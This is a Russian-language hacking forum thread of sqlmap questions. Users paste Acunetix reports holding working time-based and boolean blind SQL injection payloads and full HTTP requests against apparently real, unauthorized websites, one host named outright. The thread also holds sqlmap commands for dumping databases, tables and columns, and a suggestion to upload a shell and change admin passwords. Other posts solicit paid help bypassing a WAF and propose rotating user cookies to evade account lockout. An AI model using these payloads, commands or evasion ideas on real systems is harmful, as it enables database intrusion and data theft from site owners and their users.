Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    404
    Likes Received:
    278
    Reputations:
    3
    да
     
    hashfinderboss likes this.
  2. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    404
    Likes Received:
    278
    Reputations:
    3
    --ignore-code=500 по пробуй
     
    ex3x1 likes this.
  3. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    404
    Likes Received:
    278
    Reputations:
    3
    Помогло? У меня несколько раз прокатывало
     
    ex3x1 likes this.
  4. hashfinderboss

    hashfinderboss New Member

    Joined:
    31 Jan 2020
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    как то можно поменять пароль в админку через мап?
    может быть возможно если есть привлегии и тп?
     
  5. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    404
    Likes Received:
    278
    Reputations:
    3
    Возможно, если есть приведении и тп то можно шел залить и делать все что угодно
     
  6. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,420
    Likes Received:
    814
    Reputations:
    851
    Если инъекция в UPDATE или после ; то можно попробовать.
     
    _________________________
  7. hashfinderboss

    hashfinderboss New Member

    Joined:
    31 Jan 2020
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    я знаю что есть ерор,унион,болеан,таймбасед,стэйкед,инлине а как выглядит UPDATE?как проверить UPDATE или нет?
     
  8. mixer123

    mixer123 Member

    Joined:
    19 Sep 2011
    Messages:
    17
    Likes Received:
    5
    Reputations:
    0
    Доброго времени всем. При таком запросе:
    sqlmap.py --random-agent -u "https://www.site.com" --dbs --keep-alive
    Получаю название бд. Дальше при такой команде:
    sqlmap.py --random-agent -u "https://www.site.com" target url -D dbname --tables
    Получаю следующее:
    [​IMG]

    Пробовал напрямую делать запрос:
    sqlmap.py --random-agent -u "https://site.com" target url -D dbname -T user --columns

    Такая же ошибка
    [​IMG]

    Я так понимаю дело в этом?

    [​IMG]

    Подскажите пожалуйста, какие команды можно попробовать? Что можно сделать?
    Структура движка мне знакома. Исходя из этого, названия таблиц и колонок я предположительно знаю.

    P.s
    Если у кого есть свободное время, и опыт в обходе WAF, просьба написать в лс.
    Есть предложение на взаимовыгодных условиях.
     
    #1028 mixer123, 2 Apr 2020
    Last edited: 2 Apr 2020
  9. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    280
    Likes Received:
    119
    Reputations:
    27
    UPDATE, это оператор который обновляет столбцы в базе данных.
    mysql.ru/docs/man/UPDATE.html

    Если выполнить вывод из той же таблицы в которую гипотетически идет обновление строк, MySQL выбьет ошибку Can't specify target table for update in FROM clause
     
  10. mixer123

    mixer123 Member

    Joined:
    19 Sep 2011
    Messages:
    17
    Likes Received:
    5
    Reputations:
    0
    Застрял на этом моменте:

    [​IMG]

    Подскажите, что делать дальше?
     
    #1030 mixer123, 2 Apr 2020
    Last edited: 2 Apr 2020
  11. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    404
    Likes Received:
    278
    Reputations:
    3
    Искать тамперы
     
    mixer123 likes this.
  12. rozzet

    rozzet New Member

    Joined:
    29 Oct 2017
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Как эксплуатировать найденые уязвимости акунетикс в sqlmap?помогите разобраться


    например это?
    The vulnerability affects https://site.com/product/11/HP-4250N-LaserJet-Printer-LIKE-NEW , X-Forwarded-For

    Discovered by Blind SQL Injection

    Attack Details
    arrow_drop_up
    HTTP Header input X-Forwarded-For was set to 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z

    Tests performed:
    0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 20.152
    0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 3.489
    0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 12.599
    0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 7.906
    0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.474
    0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.489
    0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 12.479
    0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.852
    0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.218


    Original value: 3iv1i

    HTTP Request
    arrow_drop_up
    GET /product/11/HP-4250N-LaserJet-Printer-LIKE-NEW HTTP/1.1
    Referer: https://www.google.com/search?hl=en&q=testing
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
    X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
    Cookie: PHPSESSID=nfek80so1e2bn7p6st0503aro0
    X-Requested-With: XMLHttpRequest
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Encoding: gzip,deflate
    Host: copyfaxes.com
    Connection: Keep-alive
     
  13. rozzet

    rozzet New Member

    Joined:
    29 Oct 2017
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    и это например?буду предельно благодарен за помощь.
    The vulnerability affects https://www.site.com/ , /<s>-<n>-[*]-<n>.html

    Discovered by Blind SQL Injection

    Attack Details
    arrow_drop_up
    Path Fragment input /<s>-<n>-[*]-<n>.html was set to volts-amplifier-and-cd-players' AND 3*2*1=6 AND '000iUNL'='000iUNL

    Tests performed:
    volts-amplifier-and-cd-players' AND 2*3*8=6*8 AND '000iUNL'='000iUNL => TRUE
    volts-amplifier-and-cd-players' AND 2*3*8=6*9 AND '000iUNL'='000iUNL => FALSE
    volts-amplifier-and-cd-players' AND 3*3<(2*4) AND '000iUNL'='000iUNL => FALSE
    volts-amplifier-and-cd-players' AND 3*2>(1*5) AND '000iUNL'='000iUNL => TRUE
    volts-amplifier-and-cd-players' AND 3*2*0>=0 AND '000iUNL'='000iUNL => TRUE
    volts-amplifier-and-cd-players' AND 3*3*9<(2*4) AND '000iUNL'='000iUNL => FALSE
    volts-amplifier-and-cd-players' AND 5*4=20 AND '000iUNL'='000iUNL => TRUE
    volts-amplifier-and-cd-players' AND 5*4=21 AND '000iUNL'='000iUNL => FALSE
    volts-amplifier-and-cd-players' AND 5*6<26 AND '000iUNL'='000iUNL => FALSE
    volts-amplifier-and-cd-players' AND 7*7>48 AND '000iUNL'='000iUNL => TRUE
    volts-amplifier-and-cd-players' AND 3*2*0=6 AND '000iUNL'='000iUNL => FALSE
    volts-amplifier-and-cd-players' AND 3*2*1=6 AND '000iUNL'='000iUNL => TRUE


    Original value: volts-amplifier-and-cd-players

    HTTP Request
    arrow_drop_up
    GET /search-110-volts-amplifier-and-cd-players'%20AND%203*2*1=6%20AND%20'000iUNL'='000iUNL-1517.html HTTP/1.1
    X-Requested-With: XMLHttpRequest
    Referer: https://www.site.com/
    Cookie: PHPSESSID=jbf01bl7tu9q5j81f3mui12mof
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Encoding: gzip,deflate
    Host: www.site.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive
     
  14. vladF

    vladF New Member

    Joined:
    5 Dec 2018
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Всем привет. Acunetix выдал такое:
    Code:
    Уязвимость затрагивает https://www.site.com/ , / <s> / <s> / [*] / <s> /
    
    Обнаружено слепым SQL-инъекцией
    
    Детали атаки
    arrow_drop_up
    Вход фрагмента пути / <s> / <s> / [*] / <s> / был установлен в 0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z Выполнены
    
    тесты :
    0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.294
    0'XOR (if (now () = sysdate (), sleep (6), 0)) XOR'Z => 6.29
    0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,283
    0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.29
    0'XOR (if (now () = sysdate (), sleep (3), 0)) XOR'Z => 3.255
    0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,286
    0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.314
    0'XOR (if (now () = sysdate (), sleep (6), 0)) XOR'Z => 6.252
    0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,31
    
    
    Первоначальное значение: doe-spiransuchor
    
    HTTP-запрос
    arrow_drop_up
    GET / spaelet / ubonteutr / 0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z /
    Как правильно скормить в sqlmap?
     
  15. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    404
    Likes Received:
    278
    Reputations:
    3
    Точно так же как написали выше, со слепыми может быть ложное срабатывание
     
    rozzet and vladF like this.
  16. vladF

    vladF New Member

    Joined:
    5 Dec 2018
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Двумя сканерами проверил,не должна быть ложная
     
  17. kasper2020

    kasper2020 New Member

    Joined:
    30 Apr 2020
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Можно ли обойти WAF который блокирует все запросы POST, GET, в которых содержится "select*from", "update*set","delete*from" регистро-независимо?
    Не совсем понятно на каком уровне проходит WAF, но urlencode блокируется.

    back-end DBMS: MySQL >= 5.0.0
    banner: '5.7.26-log'
    server: Apache/2.2.15 (CentOS)
    x-powered-by: PHP/5.3.3
     
  18. LeninDie

    LeninDie Member

    Joined:
    26 Dec 2015
    Messages:
    60
    Likes Received:
    7
    Reputations:
    2
    столкнулся с ситуацией что приложение лочит аккаунт после 10 ошибок 500, скуля слепая и иначе данные никак не получить. поскольку лочится сам аккаунт то думаю что можно юзать куки от нескольких пользователей. на ум приходит только заменять куки при каждом запросе на новые и далее по кругу при каждом запросе (брать их из текстового файла) с определенным таймингом и подключить этот скрипт в качестве темпера. Подскажите это осуществимо? Мог бы кто нибудь помочь с реализацией за вознаграждение?)
     
  19. rozzet

    rozzet New Member

    Joined:
    29 Oct 2017
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    если акунетикс пишет SQL injection а не блинд, значит ложные исключены?
    Как часто акунетикс выдает ложные скули?
     
  20. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    404
    Likes Received:
    278
    Reputations:
    3
    Ну если он пишет что union query или error based, то да, если time based то может и ложное, где то процентов 15
     
Loading...